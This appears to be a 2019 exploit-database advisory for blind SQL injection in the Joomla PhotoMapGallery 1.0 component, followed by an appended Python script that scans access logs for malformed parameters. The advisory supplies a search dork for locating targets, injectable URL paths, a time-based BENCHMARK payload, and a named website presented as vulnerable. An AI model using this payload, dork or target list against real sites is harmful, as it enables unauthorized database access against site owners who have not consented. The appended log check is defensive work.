- ####################################################################
- # Exploit Title : Joomla PhotoMapGallery Components 1.0 Blind SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : joomla.org
- # Software Download Link : hotjoomlatemplates.com/joomla-extensions/55-hot-photo-gallery-plugin-for-joomla
- # Software Information Link : extensions.joomla.org/extensions/photos-a-images/photo-gallery/
- # Software Version : 1.0
- # Software Price : 15$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Low
- # Google Dorks : inurl:''/index.php?option=com_photomapgallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Joomla Gallery plugin - Hot Photo Gallery is all that you need to make Photo Galleries
- of images directly in content pages of your Joomla website! This Joomla gallery plugin
- creates thumbnail images and slide show automatically from your collection of photos.
- ####################################################################
- # Impact :
- ***********
- The PhotoMapGallery 1.0 component for Joomla is prone to an SQL injection
- vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_photomapgallery&view=imagehandler&folder=[SQL Injection]
- /index.php?option=com_photomapgallery&view=photogallery&id=[ID-NUMBER]:[FOLDER-NAME-HERE]&Itemid=[SQL Injection]
- /index.php?option=com_photomapgallery&view=photogallery&id=[ID-NUMBER]:giratoire-rc1a-commune-de-crans-pres-celigny-2007&Itemid=[SQL Injection]
- # Example SQL Injection Exploit Payload :
- ************************************
- -1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] schenksa.ch/index.php?option=com_photomapgallery
- &view=photogallery&id=3:giratoire-rc1a-commune-de-crans-pres-celigny-2007&Itemid=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- No valid database connection You have an error in your SQL syntax; check the
- manual that corresponds to your MySQL server version for the right syntax to
- use near 'AND i.ordering <= AND i.published = 1 ORDER BY i.ordering
- DESC' at line 1 SQL=SELECT count(i.id) FROM jos_g_galleryitems AS
- i LEFT JOIN jos_g_cats_item_relations AS rel ON rel.itemid = i.id LEFT
- JOIN jos_g_categories AS c ON c.id = rel.catid WHERE c.id =
- AND i.ordering <= AND i.published = 1 ORDER BY i.ordering DESC
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
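
A defensive check for the parameters named in the advisory, added here as an example and not part of the original paste or the component's code: it scans web access logs for com_photomapgallery requests whose `Itemid`, `id` or `folder` values do not match the expected shape. The value formats, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed formats: Itemid is a decimal integer; id is "<number>:<slug>" as in the
# advisory's URLs; folder is restricted to a conservative character allowlist.
RULES = {
    "Itemid": re.compile(r"[0-9]{1,10}"),
    "id": re.compile(r"[0-9]{1,10}(:[A-Za-z0-9_-]{1,128})?"),
    "folder": re.compile(r"[A-Za-z0-9_/-]{1,255}"),
}
# Assumed combined log format: ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')


def check_request(target):
    """Return the com_photomapgallery parameter names that fail validation."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_photomapgallery" not in query.get("option", []):
        return []  # other components are out of scope for this check
    bad = []
    for name, pattern in RULES.items():
        # parse_qs has already percent-decoded the values (e.g. %27 -> ')
        if any(not pattern.fullmatch(v) for v in query.get(name, [])):
            bad.append(name)
    return bad


def scan(lines):
    """Yield (client_ip, status, bad_params) for each non-conforming request."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            bad = check_request(m.group(2))
            if bad:
                yield m.group(1), int(m.group(3)), bad


# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_photomapgallery&view=photogallery&id=3:summer-2007&Itemid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Feb/2019:10:00:09 +0000] "GET /index.php?option=com_photomapgallery&view=photogallery&id=3:summer-2007&Itemid=1%27 HTTP/1.1" 500 734',
    '198.51.100.7 - - [04/Feb/2019:10:00:15 +0000] "GET /index.php?option=com_photomapgallery&view=imagehandler&folder=photos%27 HTTP/1.1" 200 88',
    '203.0.113.5 - - [04/Feb/2019:10:01:00 +0000] "GET /index.php?option=com_content&Itemid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, bad in scan(SAMPLE_LOG):
        print(f"{ip} status={status} non-conforming parameters: {', '.join(bad)}")
```

The same allowlist can be enforced in front of the application (reverse proxy or WAF rule) so that non-conforming values never reach the component's query.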